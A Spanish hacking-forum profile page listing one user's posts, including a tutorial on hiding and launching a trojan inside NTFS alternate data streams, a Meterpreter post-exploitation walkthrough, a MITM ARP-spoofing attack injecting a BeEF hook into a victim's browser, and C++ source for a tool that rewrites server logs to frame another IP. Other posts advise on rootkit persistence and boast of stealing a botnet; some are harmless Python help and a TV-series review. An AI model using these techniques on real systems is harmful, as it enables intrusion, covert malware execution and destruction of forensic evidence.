Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - MagoAstral

#61
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2). Aclarados estos fallos procederé a contestar a tu segunda inquietud. Cualquier auditor de seguridad lloraría hay muchísimos software que por contrato con la empresa obligan a tener el Windows XP en un service pack desactualizado, en caso contrario no ofertarían su soporte por consiguiente son un buen blanco.
Si tienes más dudas te recomiendo que mires estadísticas!
Salu2
#62
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 27, 2015, 08:04:23 PM
Portátil.
¿Contraseña de usuario o sesión meterpreter activa?
#63
Hacking / NTFS Data Stream
Agosto 24, 2015, 11:00:44 AM
NTFS Data Stream


Estimado lector le doy la bienvenida a este nuevo aporte donde se hablará sobre los flujos alternativos de datos (ADS) y se mostrarán algunas pruebas de concepto para que se capte una mínima parte del potencial que tienen. Como siempre yo soy MagoAstral y sin más que añadir vamos a comenzar...
Llegados a este punto el lector seguirá con la inquietud sobre la definición de los flujos alternativos de datos, así que será lo primero en solventar. Básicamente podríamos decir que forman parte del sistema de archivos NTFS y su finalidad es almacenar datos dentro de datos (metadatos), y todo esto en el mismo fichero! ¿Suena interesante verdad?  Aclararé la definición de NTFS por si alguno se ha perdido, simplificando diríamos que es un sistema de archivos inicialmente utilizado en Windows NT y ha pervivido hasta nuestros días.
Para concretar, en 1993, Microsoft sacó a luz dicha versión de Windows (NT), la cual contenía el sistema de archivos NTFS con el soporte de los ADS cuya finalidad era soportar forks nativos de los sistemas Mac, lo que se traduce como ofertar compatibilidad.
Un ejemplo de ADS sería el Zone.Identifier que alberga el identificador de zona de Internet de donde se descargó el fichero, dicha información será analizada por Windows Explorer, y este decidirá si se debe advertir al usuario en el tiempo de ejecución del programa.
Podríamos destacar que en Windows el flujo de datos principal se llama :$DATA
Con esto doy por finalizada la parte teórico-histórica, procedamos pues a un plano más practico sobre el uso que podemos dar a dichos flujos, es muy recomendable que el lector practique y lleve a cabo las pruebas de concepto que se desarrollarán a continuación.
Parte práctica
En la primera prueba de concepto se guardará información dentro de un archivo de texto utilizando el flujo alternativo de datos. Para efectuar dicho proceso se seguirán los siguientes pasos:
Código: dos

echo Texto guardado dentro del flujo alternativo de datos del archivo > texto.txt:flujo.txt

Para leer el contenido:
Código: dos
more < texto.txt:flujo.txt

De esta manera:

En esta segunda prueba de concepto vamos a guardar un ejecutable a modo de malware dentro de un archivo de texto y para llevar a cabo dicho proceso se seguirá la siguiente sintaxis:
Código: dos
type archivo.exe > texto.txt:archivo.exe


A la hora de ejecutarlo es muy importante que pongan toda la ruta ejemplo:
Código: dos
start c:\texto.txt:Troyano.exe

En caso de que quieran extraer el ejecutable sería mediante:
Código: dos
cat c:\texto.txt:Troyano.exe > troyano.exe

La extracción mediante el cat es única para windows 2003!
Quizás tengan problema en sistemas como windows 7 y superiores, así que se recomienda utilizar windows server o windows xp para llevar a cabo las pruebas de concepto.
Con esto daré por concluido el aporte, cualquier duda o aclaración sentiros libres para comentarla.
Un saludo!
#64
Hola @nikolkai47 , es un honor poder resolverte las dudas y sin buscarle los 3 pies al gato comenzaré.

  • Según mis experiencias en el mundo del malware, la persistencia, la backdoorización y todo ese proceso de post-explotación sin lugar a dudas te recomendaría la persistencia de un rootkit obviamente la persistencia del rootkit al payload del meterpreter varía en los anillos. En el rootkit serás ring0 y en el payload del meterpreter serás ring3 la detección de ambos no tiene comparación pues uno lo estás ejecutando a nivel aplicación y el otro al nivel del núcleo.
    ¿Cual es el problema?
    Si no eres root o no tienes acceso a la raíz ¿cómo vas a instalar un rootkit?, obviamente tienes que haber elevado privilegios de alguna manera para poder garantizar el exitoso funcionamiento de tu rootkit,
  • Volvemos a lo de antes todo dependerá si has instalado un rootkit o no, si has instalado un rootkit la detección va ser muy tediosa y la eliminación puede ser imposible. Si por contrario has iniciado un modulo de persistencia, no será muy difícil su visualización, como tu dices con listar las conexiones activas del sistema ya se ve si hay un bichito corriendo.
    En temas legales obviamente que tendrá libertad para denunciarte, ha no ser que se haya realizado en un sistema aislado y controlado o tengas un papelito autorizando esas acciones malévolas.
  • No entiendo la pregunta "el servidor escuchando en teoría tiene un puerto abierto a la espera de una shell sin cifrar" más o menos intenté traducirla, prueba a conectar con una herramienta de red tipo netcat al puerto a lo mejor te devuelve la shell, pero no entiendo la pregunta.
  • El reverse_https como tu dices te permite conectarte dentro de una conexión SSL auténtica. Si te preguntas como detectar dicho payload por eso que mencionaste de confundir o evadir los antivirus puedes hacerlo siguiendo estos patrones:

    • El certificado no está firmado por trusted CA
    • Los nombres de dominio son ficticios
    • Los nombres de dominio terminan con .com, .gov o .net
    • El periodo de validación es de 1 mes exacto
Espero poder haber solucionado tus dudas, cualquier problema que tengas siéntete libre de contactarme!
Saludos
#65
Hola LionSec, la verdad es que es una cosa muy sencilla te recomiendo que eches un ojo a un manual básico de python.
El script seria:
Código: python

#!/usr/bin/env python
# coding: utf-8

texto = """tu texto estaría por aquí
esto es un ejemplo de texto caracola
Underc0de hola caracola"""

for lineas in texto.splitlines():
     if "caracola" in lineas:
            print lineas

Bueno esto es todo se auto entiende si tienes cualquier duda comentala.
Un saludo
#66
Yo podría ayudar tanto en el cliente como en el servidor, nos pondremos en contacto pues me parece una idea quizás un tanto repetitiva pero interesante.
Un saludo!
#67
Dudas y pedidos generales / Re:Consulta sobre Shells
Agosto 07, 2015, 02:52:18 PM
Lo primero que te recomendaría es que te presentaras, pues personalmente no te responderé tus inquietudes por respeto a la comunidad. Una vez te hayas presentado puedes proceder a redactar de nuevo tus preguntas.
Un saludo!
#68
Hacking / Metasploit like a boss
Agosto 05, 2015, 04:28:42 PM
like a boss
Estimado lector vuelvo a ser yo MagoAstral, en esta ocasión les mostraré como sacar jugo extra a nuestro framework de explotación favorito es obvio que en todos o casi todos nuestros test de explotación acabamos con una sesión  y es en esa fase de "post-explotación" donde hoy nos centraremos.
Una vez que tenemos activa nuestra sesión, procederemos a migrar nuestro proceso, yo lo migraré al explorer:
Código: text
ps
migrate pid

Una vez que hemos migrado nuestro proceso podemos proceder a ejecutar nuestra shell interactiva, como sabéis metasploit está desarrollado (no en sus inicios) en ruby, por consiguiente podemos a golpe de teclado jugar con un nuevo abanico de posibilidades, para abrir dicha shell simplemente tipearemos:
Código: text
irb

Una vez que tenemos nuestra shell interactiva vemos que nos arroja un mensaje diciendo que la palabra "client" mantiene al cliente de nuestra sesión. Vamos a familiarizarnos con nuestra shell interactiva recuperando algo de información sobre la máquina víctima, por ejemplo información sobre el sistema. Para esto simplemente ejecutaremos la siguiente sintaxis:
Código: text
client.sys.config.sysinfo

Vemos que nos arroja una clase de tipo hash, mi salida por pantalla sería:

Como podemos ver dentro de esta clase de objeto podríamos llamar distintos elementos por su clave, pero eso se lo dejo al lector para que se entretenga en sus ratos libres. Es importante destacar que dentro del objeto client tiene diversos métodos, los cuales se pueden observar mediante la siguiente sintaxis:
Código: text
client.methods

Hay una gran lista y cual mas interesante, pero en esta ocasión entraremos en contacto con el método "railgun", mi salida por pantalla sería tal que así:

Railgun es una característica única de meterpreter que nos ayudará a tener el control de la API  de Windows o tomar el control de una DLL y es eso lo que lo hace tan interesante pues como mencioné anterior mente nos abre un nuevo camino en nuestras auditorias y/o pruebas de penetración.
Podemos ver las DLL cargadas mediante la siguiente instrucción:
Código: text

client.railgun.known_dll_names

La salida sería algo así:

Bueno ahora os mostraré como poder jugar con dichas DLL. En caso de que no sepamos que funciones podemos realizar con las DLL nos ayudaremos de Microsoft, supongamos que queremos obtener el ID del proceso al que migramos anteriormente, sabemos que con la DLL kernel32 lo podemos hacer pero desconocemos la función a utilizar. Gracias a Google y Microsoft podríamos acceder a la lista de funciones en mi caso sería esta:
Código: text
http://www.geoffchappell.com/studies/windows/win32/kernel32/api/

Buscaremos la función a utilizar y luego para saber la sintaxis de dicha función nos ayudaremos de MSDN en mi caso sería la función: "GetCurrentProcessId" la url:
Código: text
https://msdn.microsoft.com/es-es/library/windows/desktop/ms683180(v=vs.85).aspx

Como vemos no necesita ningún parámetro por consiguiente ejecutamos lo siguiente:
Código: text
client.railgun.kernel32.GetCurrentProcessId

Nos devolverá algo así:

Y de esta manera podrás buscar información sobre las DLL y jugar con sus funciones obviamente nadie sabe de memoria todo y los programadores sabrán que con frecuencia se recurre a esta metodología de búsqueda, recordar que la practica hace al maestro.
Para finalizar se llevó a cabo la ejecución de una alerta con railgun el resultado:

Con esto doy por concluido el post, dejo a imaginación del lector lo que se puede llegar a realizar...
Un saludo!
#69
La verdad no he parado a leer todo lo que has escrito pero revisa tus nociones básicas sobre python (comparadores lógicos), he realizado algunos arreglos:
Código: python

def checkio(number):
   if(0< number and number<100):
       if(number%3==0):
           print "Fizz Buzz"
       else:
           print "No es divisible por 3"
       if(number%5==0):
            print"Buzz"

number = input("Introduzca un entero:\n")
checkio(number)
print ("El numero: " + str(number) + " es divisible entre alguno de los dos ")

Cualquier duda que tengas puedes decírmelo por mensajería privada o el chat IRC.
Un saludo!
#70
15
#71
Códigos Fuentes / Suplantación de Logs
Julio 24, 2015, 01:58:51 PM
Hola a todos, esta tarde estaba pensando en programar un zapper en C++ pero cuando me puse a hacerlo cambie de idea y pensé en crear una aplicación que suplantase la IP del atacante y así tocar un poco la moral del Sysadmin.
El código es sencillo se abre el log, se leen las líneas y se guardan en una string. A continuación se busca y reemplaza la ip del atacante por otra dirección IP en la string y luego se guarda dicha string con las modificaciones en el log.
Cualquier duda comentármela obviamente es una chapuzilla pero bueno si ha alguien le sirve, por compartir que no sea ;)
Código: cpp

#include <iostream>
#include <fstream>
#include <string>

using namespace std;

int main()
{

ifstream a_entrada;
ofstream a_salida;

string ruta_log, linea, cuerpo, ip1, ip2;

cout << "Ruta del log: ";

cin >> ruta_log;

a_entrada.open(ruta_log.c_str());

if (a_entrada.fail())
{
cout << "El log no se puede abrir" << endl;
}

while(getline(a_entrada, linea))
{
cuerpo += linea +"\n";
}

a_entrada.close();

cout << "IP 1: ";
cin >> ip1;
cout << "IP 2: ";
cin >> ip2;

string::size_type p = 0;

while((p = cuerpo.find(ip1, p)) < string::npos)
{
cuerpo.replace(p, ip1.length(), ip2);
p+=ip1.size();
}

a_salida.open(ruta_log.c_str());

if (a_salida.fail())
{
cout << "No se pudo guardar el log" << endl;
}

a_salida << cuerpo;
a_salida.close();

cout << "Archivo log envenenado correctamente!";

system("pause");
return 0;
}
#72
No te líes simplemente si quieres ejecutar un comando utilices o no un debugger se ejecuta entre comillas no se si me explico, te pondré un ejemplo con tu programa:
Código: bash

./exploitme
Hola! Dime tu nombre: `python -c  'print "A"*10'`
Tu nombre es AAAAAAAAAA

Simplemente pones unas comillas simples y a continuación la sintaxis si usas python pues python -c, si usas perl pues perl -e o lo que tu quieras.
Un saludo
#73
Off Topic / Mr Robot
Julio 22, 2015, 11:22:49 AM
Mr Robot
Hola a todos, soy yo MagoAstral en esta ocasión vengo a traer un nuevo post, que me extraña que nadie lo hubiese publicado antes que yo. He decidido la sección noticias informáticas pues quizás no sea explícitamente una noticia informática pero bueno si algún moderador lo considera más correcto en la sección off-topic que lo mueva libremente.
Básicamente vengo a hablaros de una nueva serie sobre este mundo paranoico que tanto gusta, la seguridad informática y el hacking, muchos sabrán que han existido series similares como Cyber CSI pero siempre acaban exagerando y  engañando a la audiencia por contrario esta serie es bastante real y es por eso por lo que os la vengo recomendando.
Personalmente el primer capítulo me enganchó muchísimo, muy bien realizado con una buena temática y el personaje principal "eliot" muy peculiar, logra esa situación psicológica que te atrae hacia el conocimiento. He de reconocer que el nivel de la serie ha decrecido con cada capítulo aun así para los aficionado a todo este rollo nos sigue gustando y más a los aficionados hacia la series o películas que traten sobre personas inteligentes que hacen grandes deducciones o que simplemente te hacen pensar.
La serie es de origen estadounidense y el creador es Sam Esmail y se estrenó el 24 de junio de 2015.
Argumento:
Código: text

La serie sigue a Elliot (Rami Malek), un joven hacker que sufre de trastorno antisocial de la personalidad, trabaja como ingeniero de seguridad informática y usa sus habilidades para proteger a las personas por las que se preocupa. Elliot es reclutado por Mr. Robot (Christian Slater), un misterioso líder de un grupo de hackers quien quiere destruir a poderosos empresarios de multinacionales que él cree que están manejando el mundo.

Desarrollo:
Código: text

En julio de 2014 USA Network ordenó un piloto para una serie dramática titulada Mr. Robot producida por Sam Esmail. En septiembre de 2014 se confirmó que Rami Malek tomaría el papel principal, mientras que Carly Chaikin y Portia Doubleday tendrían los papeles de Marlene y Angela respectivamente. En octubre se anunció que Christian Slater desempeñaría el rol de Mr. Robot. En este mismo mes se informó que Martin Wallström se unía al elenco.
En diciembre de 2014 la cadena dio a conocer la orden de diez episodios a estrenarse el 24 de junio de 2015.
El 27 de mayo de 2015 se liberó el episodio piloto en variados sitios de la web como estrategia de promoción. El presidente de la cadena USA Network dijo al respecto que la idea de hacer esto es para romper con los límites y llegar a nuevas audiencias.

Recepción:
Código: text

Mr. Robot ha recibido críticas muy positivas. El sitio web Rotten Tomatoes le da una aprobación del 96% en donde se agrega que "Mr. Robot es un ciber-thriller de suspenso con historias oportunas y una intrigante premisa provocativa". En la página web Metacritic se le da una aprobación del 78%, con una calificación del usuario de 8.9. Mientras tanto el sitio Forbes le dio a la serie una muy buena crítica, manifestando que "Mr. Robot tiene nada más que cosas positivas a su favor" además de ser un show televisivo que está en camino de ser un clásico moderno.

Episodios 1º temporada:
Código: text

eps1.0_hellofriend.mov
eps1.1_ones-and-zer0es.mpeg
eps1.2_d3bug.mkv
eps1.3_da3m0ns.mp4
eps1.4_3xpl0its.wmv
eps1.5_br4ve-trave1er.asf
eps1.6_v1ew-s0urce.flv
eps1.7_wh1ter0se.m4v
eps1.8_m1rr0r1ng.qt
eps1.9_zer0-day.avi

Ahora vamos a la parte interesante, bueno la serie por ahora está en lenguaje inglés subtitulada a español se preguntarán donde ver dichos capítulos. Comenzaré enseñando el trailer y la versión extendida:
Código: text

https://www.youtube.com/watch?v=Ug4fRXGyIak
https://www.youtube.com/watch?v=U94litUpZuc
https://www.youtube.com/watch?v=nJNZF3LR0VM

Y ahora para ver la serie os recomiendo:
Código: text

seriesflv .net/serie/mr-robot.html

Y esto es todo, espero que comentéis vuestras opiniones respecto a esta nueva serie.
Un saludo!
#74
Hacking / MITM + BeEF
Julio 21, 2015, 09:46:36 AM
Man In The Middle + BeEF
Hola a todos, soy MagoAstral y les mostraré otra técnica más de explotación, en esta ocasión se realizará un ataque de mitm para inyectar un script (js) externo en el navegador de la víctima. Aunque parezca un ataque muy complejo verán que  hasta el lector más inexperto logrará comprender los conceptos básicos de esta metodología.
Para los que se pregunten que es un man in the middle attack (mitm), consiste en mediante una forma u otra adquirir el poder de leer y/o modificar el tráfico o mensajes. Puede que ahora tengan inquietud sobre el segundo término del título beef, simplemente es un framework para la explotación de navegadores.
A continuación se describirá el escenario:

  • Kali Linux - Atacante

    • Mitmf
    • Beef
  • Windows 7 - Víctima

    • Google Chrome
El primer paso será iniciar BeEF, para eso nos situaremos en la ruta y lo abriremos:
Código: bash

cd /usr/share/beef-xss
./beef

La salida de la termianal:

A continuación procederemos a instalar el framework mitmf que nos simplificará todo el proceso tedioso. Para instalarlo simplemente tipearemos:
Código: bash

apt-get install mitmf

La salida de nuestra terminal debería ser algo así:

Una vez que ya hemos instalado nuestro mitmf, procederemos a lanzar el ataque, pero para eso necesitamos identificar nuestro gateway o puerta de enlace predeterminada y la víctima obviamente al estar en nuestro laboratorio sería tan sencillo como ejecutar un "ipconfig" en la máquina víctima y el proceso de identificación se daría por zanjado, pero esto en el mundo real no es así. Para identificar a nuestra víctima nos ayudaremos de la herramienta netdiscover que nos proporcionará la información necesaria para deducir cual es la máquina. Una vez tengamos su dirección IP podríamos verificar que el sistema que utiliza es windows mediante un nmap o con el truco de la abuela, por regla general en local si se realiza un ping a una máquina windows el ttl (tiempo de vida) de un paquete es 128 por contrario si es un gnu/linux será 64.
Ejecutaremos:
Código: bash

netdiscover
route -n

La salida de la terminal:

Ahora que tenemos todos los elementos necesarios podemos comenzar nuestro ataque mediante la siguiente sintaxis:
Código: bash

mitmf --spoof --arp -i interface --gateway gateway --target target --inject --js-url nuestrojs

La salida de mi terminal:

Recordad que el parámetro --js-url es el hook de nuestro beef el cual se muestra en pantalla cuando arrancamos el beef.
¿Arp Spoofing? ¿Qué es?
Para empezar yo definiría ARP, que es básicamente un protocolo de capa de red cuya función es identficiar la MAC Address o dirección física de una dirección IP. ARP Spoofing sería enviar paquetes ARP modificados normalmente se asocia la MAC Address del atacante con la dirección IP de otro nodo.
Una vez el ataque es puesto en marcha desde la máquina afectada podríamos ver como se ha modificado la dirección Mac del gateway:
Código: dos

arp -a

Salida:

Ahora cuando la víctima decida navegar utilizando su navegador favorito en su página web favorita no sabrá que se ha inyectado nuestro script. Si utilizamos un depurador web podemos ver como se ha inyectado correctamente:

Y ya para finalizar desde nuestro panel web de BeEF tenemos la sesión activa de nuestra víctima:

Y con esto doy por concluido el post, espero que les haya servido y comenten sus inquietudes.
Un saludo,
MagoAstral
#75
Es un troll
#76
Sin palabras compañero, muchas gracias, aprecio el tiempo que has gastado en redactar e ilustrar el aporte. Espero que la gente agradezca tu trabajo pues no es para menos.
Un saludo
#77
Tus aportes son excelentes compañero, realmente me quito el sombrero vaya material estás proporcionando espero que la gente se de cuenta de lo que valen estos manuales de Offensive Security...
Un saludo!
#78
Bugs y Exploits / Re:Cazador de Botnets: [Zeus]
Julio 10, 2015, 03:10:03 PM
La única que te puedo pasar públicamente es esta que la pasé a un contacto en su día por whatsapp las otras si mal no recuerdo las tengo por un HDD perdidas, la botnet era una Citadel y para obtener el acceso vulneré el servidor en bruto.
#79
Bugs y Exploits / Re:Cazador de Botnets: [Zeus]
Julio 10, 2015, 01:44:56 PM
Yo un día robé una botnet que tenía algún sistema de la interpol infectado, aún guardo las capturas de pantalla :)
Y respeto al aporte, insuperable muy bien estructurado y un contenido excepcional, me quito el sombrero ante usted.
#80
Me lo apunto, a ver si esta tarde puedo echarle un ojo.
Un saludo y gracias por el reto!